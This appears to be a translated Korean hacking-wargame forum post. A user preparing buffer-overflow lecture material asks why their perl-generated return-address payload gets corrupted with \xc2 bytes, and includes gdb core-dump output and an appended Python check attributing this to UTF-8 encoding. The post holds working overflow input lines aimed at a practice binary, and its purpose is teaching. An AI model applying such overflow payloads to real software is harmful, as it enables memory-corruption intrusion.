Linux

   smile0909
   Hex code is not getting inserted into the stack on the ftz server ㅠ

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_linux&no=4392


To make lecture material on a simple BOF, I am logged in with the guest account on the ftz server and testing.
All the options that can be set at compile time are set. (-z execstack -fno-builtin -mpreferred-stack-boundary=2)

With a bof attack I am trying to put an address value (\x92\x83\x04\x08) into the return address part of the stack, but it doesn't work, so..
I took a core dump, and \xc2 values keep getting inserted in between, like \xc2\x92\xc2\x83\xc2\x04\xc2\x08.

The size of the char array buffer is 4.
The output is as below..

[guest@ftz test]$ perl -e 'print "a"x4,"b"x4,"\x92\x83\x04\x08"' | ./test
aaaabbbb혪혘
Segmentation fault (core dumped)
[guest@ftz test]$ gdb test core.9330
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
Core was generated by `./test'.
Program terminated with signal 11, Segmentation fault.
Cannot access memory at address 0x400160b0
#0  0x83c292c2 in ?? ()


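Did you perhaps intentionally set it up so that garbage values get inserted in between when hex code is put on the stack?
This is a method that definitely worked before... strange.. I think it definitely worked on the ftz server too last year or the year before, so why does it suddenly not work? ㅠㅠ

+
As shown below, it works fine on the BOF Expedition (BOF원정대) server. (I created a separate guest account there.)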
[guest@localhost test]$ perl -e 'print "a"x4,"b"x4,"\x38\x84\x04\x08"' | ./test
aaaabbbb8?
bof success!


  Hit : 2656     Date : 2015/01/23 04:38
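
An added check, not part of the original post: read as little-endian bytes, the faulting address 0x83c292c2 in the gdb output is c2 92 c2 83, which is the UTF-8 encoding of code points U+0092 and U+0083. The Python below reproduces that value from the post's payload; the offset 8 for the saved return address is an assumption taken from the payload layout (4 + 4 filler bytes), and the function names are made up for this example.

```python
import struct

PAYLOAD = b"a" * 4 + b"b" * 4 + b"\x92\x83\x04\x08"  # byte string from the post
OBSERVED_PC = 0x83C292C2                              # frame #0 in the gdb output
RET_OFFSET = 8                                        # assumption: 4-byte buffer + 4 more bytes


def utf8_expand(intended: bytes) -> bytes:
    """Treat every byte as a code point U+0000..U+00FF and encode it as UTF-8.

    This is what a text-mode (character) output layer does to a string that
    was meant as raw bytes: values below 0x80 pass through unchanged, values
    0x80..0xBF gain a 0xC2 lead byte, values 0xC0..0xFF gain a 0xC3 lead byte.
    """
    return intended.decode("latin-1").encode("utf-8")


def pc_from_stream(stream: bytes, offset: int) -> int:
    """The 4 bytes at `offset`, read as a little-endian 32-bit value (i386)."""
    return struct.unpack_from("<I", stream, offset)[0]


def expanded_positions(intended: bytes) -> list:
    """Indexes of bytes that do not survive UTF-8 encoding unchanged."""
    return [i for i, b in enumerate(intended) if b >= 0x80]


def matches_utf8_artifact(intended: bytes, observed_pc: int, offset: int) -> bool:
    """True if the observed program counter is what lands at `offset`
    after the intended bytes have been UTF-8 encoded on their way out."""
    return pc_from_stream(utf8_expand(intended), offset) == observed_pc


if __name__ == "__main__":
    print("intended pc : %#010x" % pc_from_stream(PAYLOAD, RET_OFFSET))
    print("after UTF-8 : %s" % utf8_expand(PAYLOAD)[RET_OFFSET:].hex(" "))
    print("observed pc : %#010x" % OBSERVED_PC)
    print("high bytes  : %s" % expanded_positions(PAYLOAD))
    print("UTF-8 match : %s" % matches_utf8_artifact(PAYLOAD, OBSERVED_PC, RET_OFFSET))
```
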



    